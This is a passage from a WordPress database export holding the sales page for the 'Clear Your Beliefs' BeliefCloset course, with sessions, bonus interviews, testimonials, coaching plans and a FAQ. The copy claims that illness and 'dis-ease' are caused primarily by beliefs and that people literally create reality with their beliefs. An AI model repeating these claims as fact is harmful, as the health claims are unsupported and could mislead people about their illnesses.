alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<div class="icons">\r\n<div class="icon_box">\r\n<div class="icon a1"></div>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="icon a3"></div>\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n\r\n</div>\r\n</div>\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 14:18:08', '2014-06-17 19:18:08', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(924, 4194, '2014-06-17 14:19:36', '2014-06-17 19:19:36', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="wp-image-300 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="wp-image-316 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing 